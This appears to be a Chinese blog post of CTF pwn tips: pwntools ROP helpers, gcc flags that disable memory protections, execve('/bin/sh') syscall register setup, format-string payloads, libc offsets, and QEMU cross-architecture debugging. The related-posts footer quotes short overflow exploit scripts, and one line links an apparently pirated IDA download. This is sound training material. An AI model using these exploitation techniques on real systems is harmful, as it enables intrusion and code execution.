ctf-pwn的一些小技巧

最新推荐文章于 2025-06-13 14:06:33 发布
原创 最新推荐文章于 2025-06-13 14:06:33 发布 · 5.1k 阅读 · 9 ·
CC 4.0 BY-SA版权
钞sir
文章标签:

#pwn

本文介绍如何利用Pwntools简化ROP攻击过程,包括使用ROPgadget查找gadget,利用plt和got表进行函数调用,以及通过gdb进行调试等技巧。此外,还涉及gcc编译选项、格式化字符串攻击、libc版本查询和异构环境搭建等内容。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

当我们在写exp的时候有些需要去复制粘贴某些函数在plt表,got表的地址,或者找ROP的地址,有些时候复制粘贴不方便且不方便阅读,这样时候我们就可以用pwntools中提供的一些函数;

以32位程序的exp为例:

ROPgadget:

0x0804872f : pop ebp ; ret
0x0804872c : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x0804843d : pop ebx ; ret
0x0804872e : pop edi ; pop ebp ; ret
0x0804872d : pop esi ; pop edi ; pop ebp ; ret
0x08048426 : ret
0x0804857e : ret 0xeac1

在exp中的0x0804843d,可以这样代替:

p32(rop.search(8).address)

其中rop:

proc = ‘文件路径’
elf = ELF(proc)
rop = ROP(elf)

找到gets函数在plt表中的位置,并将一段字符串写入bss段中:

p32(elf.plt['gets']) + 'aaaa' + p32(elf.bss()+0x100)
p.sendline("要写入的字符串")

获得gets函数在got表中的地址:

p32(elf.got['puts'])

在exp中附加gdb调试exp:

context.log_level = 'debug'

#context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
#deepin系统要加这句
if args.G:
    gdb.attach(p)

当带G参数运行exp时(python exp.py G),就会把gdb附加进去了;

gcc编译:

NX:-z execstack / -z noexecstack (关闭 / 开启)   

Canary:-fno-stack-protector /-fstack-protector / -fstack-protector-all (关闭 / 开启 / 全开启) 

PIE:-no-pie / -pie (关闭 / 开启)   

RELRO:-z norelro / -z lazy / -z now (关闭 / 部分开启 / 完全开启) 

遇到程序当中有alarm时可以:

1. 直接vim程序,修改alarm为isnan可以patch掉alarm函数;

2. 或者sed -i s/alarm/isnan/g ./pwn1

执行int 0x80可执行对应的系统调用:

查找int 0x80:

ROPgadget --binary ./file_name --only "int 0x80"
ROPgadget --binary ./file_name --opcode cd80c3

比如对于系统调用

execve("/bin/sh",NULL,NULL)
  • 系统调用号即eax应该为0xb(32位程序)或0x3b(64位程序)
  • 第一个参数即ebx应该指向/bin/sh的地址,其实执行sh的地址也可以
  • 第二个参数即ecx应该为0
  • 第三个参数edx应该为0

64位:

  1. 64位系统调用  
  2. mov rdi,xxxx;/bin/sh字符串的地址  
  3. mov rax,59;execve的系统调用号  
  4. mov rsi,0;  
  5. mov rdx,0 
  6.  syscall  

linux x64的传参方式:
它不同于x86的栈传参,它是优先6个寄存器传参,依次是RDI,RSI,RDX,RCX,R8,R9,然后多余的参数才传进栈内,所以在进行ROP,找gadget的时候注意先从rdi开始传参数,然后再是RSI,RDX,RCX,R8,R9,最后才是栈上面的;

int 80和syscenter采用的同样的传参顺序:eax,ebx,ecx,edx

但是syscall的传参顺序变成了rdi,rsi,rdx,r10,r9,r8

p.shutdown('send'):用于关闭读写通道,相当于Ctrl+c结束while循环;

知道libc.so找函数的偏移的方法:

libc = ELF('./libc.so')

system_offset = libc.symbols['system']

binsh_offset = next(libc.search('/bin/sh'))

recvuntil('?') : 直到看到' ?'后才进行操作;

格式化字符串常用函数 fmtstr_payload:

格式:

fmtstr_payload(num,{x_addr:str_addr})

num相当于%n$x中的n,表示第几个数,x_addr表示要修改的值的地址,str_addr表示需要修改成的值;

替换libc.so:

export LD_PRELOAD="/usr/lib/x86_64-linux-gnu/libproxychains.so.4"

 

gdb查看堆的快表:

p/x main_arena.fastbinsY

堆的其他查看:

p *(mchunkprt) 0x602010

find_fake_fast

exit退出的函数通过修改<_rtld_global+3848>位置可以修改rip; 先找_dl_fini的地址可以找到_rtld_global,它一个结构体;

one_gadget 通过realloc_hook(one)和__malloc_hook(__GI___libc_realloc+n)来调整;

在线查libc版本:

https://libc.blukat.me/

IDA下载:

http://fuckilfakp5d6a5t.onion.pet/

pwn异构环境搭建:

1.安装 qemu:

sudo apt-get install qemu-user

通过qemu模拟arm/mips环境,进而用gdb-multiarch进行调试;

2.安装gdb-multiarch:

sudo apt-get install gdb-multiarch

3.安装共享库:

根据需要安装,查看有那些库;

以mips为例:

apt-cache search "libc6" | grep mips

然后运行apt install +库名就可以安装;

4.运行方法:

静态链接的binary直接运行即可,会自动调用对应架构的qemu;

动态链接的bianry需要用对应的qemu同时指定共享库路径,使用-L指定共享库;

例如运行add文件:

qemu-mipsel -L /usr/mipsel-linux-gnu/ ./add

用file命令查看文件信息,然后根据文件的类型选择qemu-的类型;

qemu-的类型:

sir@sir-PC:~/desktop$ qemu-
qemu-aarch64       qemu-i386          qemu-mipsel        qemu-ppc64abi32    qemu-sparc
qemu-aarch64_be    qemu-m68k          qemu-mipsn32       qemu-ppc64le       qemu-sparc32plus
qemu-alpha         qemu-microblaze    qemu-mipsn32el     qemu-riscv32       qemu-sparc64
qemu-arm           qemu-microblazeel  qemu-nios2         qemu-riscv64       qemu-tilegx
qemu-armeb         qemu-mips          qemu-or1k          qemu-s390x         qemu-x86_64
qemu-cris          qemu-mips64        qemu-ppc           qemu-sh4           qemu-xtensa
qemu-hppa          qemu-mips64el      qemu-ppc64         qemu-sh4eb         qemu-xtensaeb

5.调试方法:

可以使用qemu的-g指定端口:

qemu-mipsel -g 1234 -L /usr/mipsel-linux-gnu/ ./add

然后启动gdb-multiarch进行调试,先指定架构,再使用remote功能指定端口:

pwndbg> set architecture mips
pwndbg> target remote localhost:1234

 

CTFshow-PWN-栈溢出(pwn62-pwn64)
Welcome To Myon'Blog !
07-10 399
本文分享了三个PWN题解法:1) pwn62利用24字节shellcode绕过保护;2) pwn63优化至23字节shellcode;3) pwn64在32位程序中直接执行写入的shellcode。每个解法都通过精心构造的payload成功获取flag,展示了不同场景下的漏洞利用技巧。文中包含完整的Python利用代码和获取的flag值。
跟着CTF-Wiki学pwn|格式化字符串(1)
Kni9hT's Blog
05-19 2383
文章目录格式化字符串漏洞原理介绍格式化字符串函数介绍格式化字符串函数格式化字符串参数格式化字符串漏洞原理格式化字符串漏洞利用程序崩溃泄露内存泄露栈内存获取栈变量数值获取栈变量对应字符串泄露任意地址内存覆盖内存覆盖栈内存确定覆盖地址确定相对偏移进行覆盖覆盖任意地址内存覆盖小数字覆盖大数字 格式化字符串漏洞原理介绍 首先,对格式化字符串漏洞的原理进行简单介绍。 格式化字符串函数介绍 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计
BUUCTF pwn题exp整合
菜的只能随便写写博客
02-29 730
0x01 rip from pwn import* p = remote('node3.buuoj.cn',27511) payload = 'a'*23+p64(0x401198)+p64(0x401186) p.sendline(payload) p.interactive()   0x02 warmup_csaw_2016 from pwn import * #p = proces...
buuctf pwn 部分exp(无解析,持续更新)
orange_cat__的博客
11-17 355
【代码】buuctf pwn 部分exp(无解析,持续更新)
CTF选手必藏的100个实战解题思路,(非常详细)从零基础到精通,收藏这篇就够了!
最新发布
Python_0011的博客
06-13 949
CTF比赛,那可是网络安全圈的华山论剑。想在里面混出名堂?光有理论知识可不行,得有实战经验,还得会各种骚操作。今天,我就把多年来在CTF赛场上摸爬滚打总结出的100个解题思路分享出来,别说我没提醒你,能看懂一半,绝对是高手中的高手!
CTF PWN-攻防世界XCTF新手区WriteUp
道阻且长,行则将至
10-20 1万+
文章目录前言001 get_shell002 hello_pwn 前言 PWN 是一个黑客语法的俚语词 ,是指攻破设备或者系统 。发音类似“砰”,对黑客而言,这就是成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被你操纵。以上是从百度百科上面抄的简介,而我个人理解的话,应该就是向目标发送特定的数据,使得其执行本来不会执行的代码,前段时间爆发的永恒之蓝等病毒其实也算得上是 pwn 的一种。 CTFPWN 类型的题目的目标是拿到 flag,一般是在 linux 平台下通过二进制/系统调用等方式编
[CTF PWN] 从0到0.00001 PWN入门超级详细
热门推荐
Csome
06-06 2万+
超级详细的CTFPwn方向的介绍,非常适合小白萌新,真的超级超级详细。Pwn的简介 Pwn的理论工具准备 初学 工具 贮备知识 入门 工具 贮备知识 Pwn的学习 初学-从Writeup中学习 入门-从比赛中学习 Pwn的环境准备 Windows 在Vscode中配置Pwn中环境 在Vscode中Pwn Pwntools的学习 简易快速入门 Pwn的做题流程 Pwn的简单例子 checksec 分析函数及漏洞 main函数 fun函数 编写exp 编写Writeup 小结
ciscn2021CTF国赛pwn
qq_39948058的博客
08-27 1508
CTF2021-05-18 总结:这次pwn的比赛难易程度尚可,菜菜的我在各位师傅的领导下勉勉强强做出了3道pwn,这三道pwn都不算太难,一道越界,越界pwny这道题确实把我搞吐了,后期卡在了ret的与数组的偏移,这个不会计算,在th1un师傅的领导下,才知道了如何计算,勉强做出来了,值得说的是数组越界在2021年比赛中出现的越来越频繁了,是真的频繁了,第二道pwn是一个堆,只不过index受到了限制,既然index受到了限制并不影响我们在同一个index构造多个chunk,所以这个题也是常规操作.
2018第四届百越杯CTF总结-pwn(附带python调用gdb小技巧
qq_35661990的博客
12-20 1826
这次做了一题逆向和pwn,不过做出的逆向太简单了就不多说了,倒是借着两题最基础的pwn题好好学习了一下ret2lib和ret2plt,以及格式化字符串漏洞。只是写payload的话,照着ctf wiki上的改几个地址就可以了。 Boring game 考察基础的ret2libc和ret2plt,在google上找到一篇把ret2libc基础讲得很好的文章 https://www.shellb...
搭建Ubuntu CTF-pwn环境
qq_34317874的博客
06-21 315
搭建Ubuntu CTF-pwn环境
CTF-浅尝64位栈溢出PWN
BadRer的博客
06-04 1万+
干了一早上终于把这道’难题’做出来了,实在是不容易。头一次完完全全的做出64位的pwn题,如果就栈溢出来说的话,其实感觉和32位的也差不多。至少这方面没有遇到太大的困难,做64位的题对汇编指令的要求就更高了。正好一边做题,一边多学点汇编。 收获是很大的。正文刚开始被一个逻辑漏洞cmp给卡着,一直没有跳到真正产生漏洞的地方,好不容易跳过去了,结果被我自己坑了(写脚本的时候,没有考虑缓冲区的影响,经常
CTF(pwn)攻防世界warmup
半岛铁盒的博客
03-06 1048
题目描述 这种题很有意思,只给了题目场景地址没有文件,让你盲打,类似于web中的盲注吧; nc连接,给了 目标地址, 思路是:利用栈溢出覆盖,返回这个地址; 具体是溢出多少是不确定的,是P64(),还是 P32() 也是不确定的; 写个EXP逐渐试一下 from pwn import * a = 0x40060d for i in range(10,100): p = remote('111.200.241.244',49684) payload='a'*i+p64(a) p.recvun
CTF(pwn)-格式化字符串漏洞讲解()
半岛铁盒的博客
02-25 952
一、基本介绍 格式化字符串漏洞在通用漏洞类型库CWE中的编号是134,其解释为“软件使用了格式化字符串作为参数,且该格式化字符串来自外部输入”。会触发该漏洞的函数很有限,主要就是printf、sprintf、fprintf等print家族函数。 printf()函数的一般形式为printf(“格式化字符串”,参数…),其第一个参数就是格式化字符串,用来告诉程序以什么格式进行输出。 它的参数是由格式化说明符与字符串组成的,通过格式化说明符来规定参数用什么格式输出内容。 格式化说明符有这些: %d - 十进制
CTF pwn 方向部分题解
kali_Ma的博客
01-12 1459
dataleak 用”\或者/都可以跳过2个\x00,但是每次用”\会拷贝4个字节到buf中,导致最后的3字节数据无法泄露,所以用/\配合垃圾数据填充来控制泄露字符串。 exp: #!python #coding:utf-8 from pwn import * import subprocess, sys, os from time import sleep sa = lambda x, y: p.sendafter(x, y) sla = lambda x, y: p.sendlineafter(x
三个pwn
weixin_52640415的博客
06-28 1994
shortcut :格式化字符串漏洞写溢出 lucky_guy:alloca负值覆盖ret babynote:libc-2.31禁用exec写 ORW free_hook->sigreturnframe-> setcontex+61->orw
pwn学习】Canary的各种绕过姿势
Morphy_Amo的博客
12-24 9166
Canary各种绕过姿势
网络安全中的POC、EXP、Payload、ShellCode_网络安全payload是什么意思
Innocence_0的博客
11-01 1308
POC:概念证明,即概念验证(英语:Proof of concept,简称POC)是对某些想法的一个较短而不完整的实现,以证明其可行性,示范其原理,其目的是为了验证一些概念或理论。在计算机安全术语中,概念验证经常被用来作为0day、exploit的别名。EXP:利用(英语:Exploit,简称EXP)一般指可利用系统漏洞进行攻击的动作程序。Payload:中文 ’ 有效载荷 ',指成功exploit之后,攻击代码释放的具有攻击能力的能够实现攻击者目的的代码。
PWN学习总结
windy_ll的博客
12-26 2391
一、栈溢出原理     什么是栈溢出?栈溢出就是缓冲区溢出的一种。 由于缓冲区溢出而使得有用的存储单元被改写,往往会引发不可预料的后果。程序在运行过程中,为了临时存取数据的需要,一般都要分配一些内存空间,通常称这些空间为缓冲区。如果向缓冲区中写入超过其本身长度的数据,以致于缓冲区无法容纳,就会造成缓冲区以外的存储单元被改写,这种现象就称为缓冲区溢出。缓冲区长度一般与用户自己定义的缓冲变量的类型有关。(PS:摘自百度百科)     简单来说,就是程序没有检查用户输入的数据长度,导致攻击者覆盖栈上不是程序希望写
Pwn常见利用方式总结
若有战,召必回
12-14 1292
目录穿越此题是NKCTF2024 httpd这道题题目分析%[^ ] 是C语言中 scanf 和 sscanf 函数用于格式化输入的格式化字符串中的一个格式说明符。具体地,%[^ ] 表示要读取的输入字符序列直到遇到第一个空格字符(空格字符之前的字符),然后将其存储到对应的变量中。其中 ^ 符号表示取反,[^ ] 表示除了空格之外的所有字符。这样的格式化说明符通常用于读取字符串中的单词或特定字符之间的内容。
CTFSHOW-PWN入门 pwn5
01-10
### CTF SHOW PWN入门 pwn5 解法 对于CTF SHOW平台上的PWN挑战,尤其是针对`pwn5`这一题目,解决方法通常涉及对二进制漏洞的理解以及如何利用这些漏洞来获取flag。 #### 题目分析 在处理这类问题时,首先需要下载并理解目标程序的行为模式。通过逆向工程工具如IDA Pro或Ghidra可以查看可执行文件内部结构,识别潜在的安全缺陷[^1]。 #### 漏洞发现 经过初步审查后得知此题存在栈溢出的可能性。当输入长度超过缓冲区大小时未作适当检查便直接复制到固定空间内,这使得攻击者能够覆盖返回地址从而控制EIP寄存器指向任意位置执行恶意代码片段[^2]。 #### 利用技巧 为了成功完成该关卡,需构建特定格式的数据包作为输入发送给服务端进程。这里采用的方法是构造ROP链(Return-Oriented Programming Chain),即精心挑选一系列现有指令序列组合起来实现所需功能而不必注入额外shellcode: ```python from pwn import * context(os="linux", arch="amd64") binary_path = './path_to_binary' elf = ELF(binary_path) # 远程连接设置 host, port = "remote_host", 1234 conn = remote(host, int(port)) # 构造payload offset = ... # 计算偏移量 ret_address = ... pop_rdi_ret_gadget = ... payload = b'A' * offset + \ p64(pop_rdi_ret_gadget) + \ p64(target_function_arg) + \ p64(ret_address) conn.recvuntil(b'Tell me your name:') conn.sendline(payload) ``` 上述Python脚本展示了基本框架,实际应用中还需根据具体情况调整参数值,比如计算正确的偏移量(offset),找到合适的gadgets等[^3]。 #### 获取Flag 一旦成功触发了预期行为,则可以通过读取内存中的字符串或其他方式获得最终答案。例如,在某些情况下可能需要解析动态链接库表项以定位标准I/O函数的实际映射地址,进而打印出隐藏信息;而在另一些场景下则可能是直接调用了puts()之类的API输出预设好的标志位[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值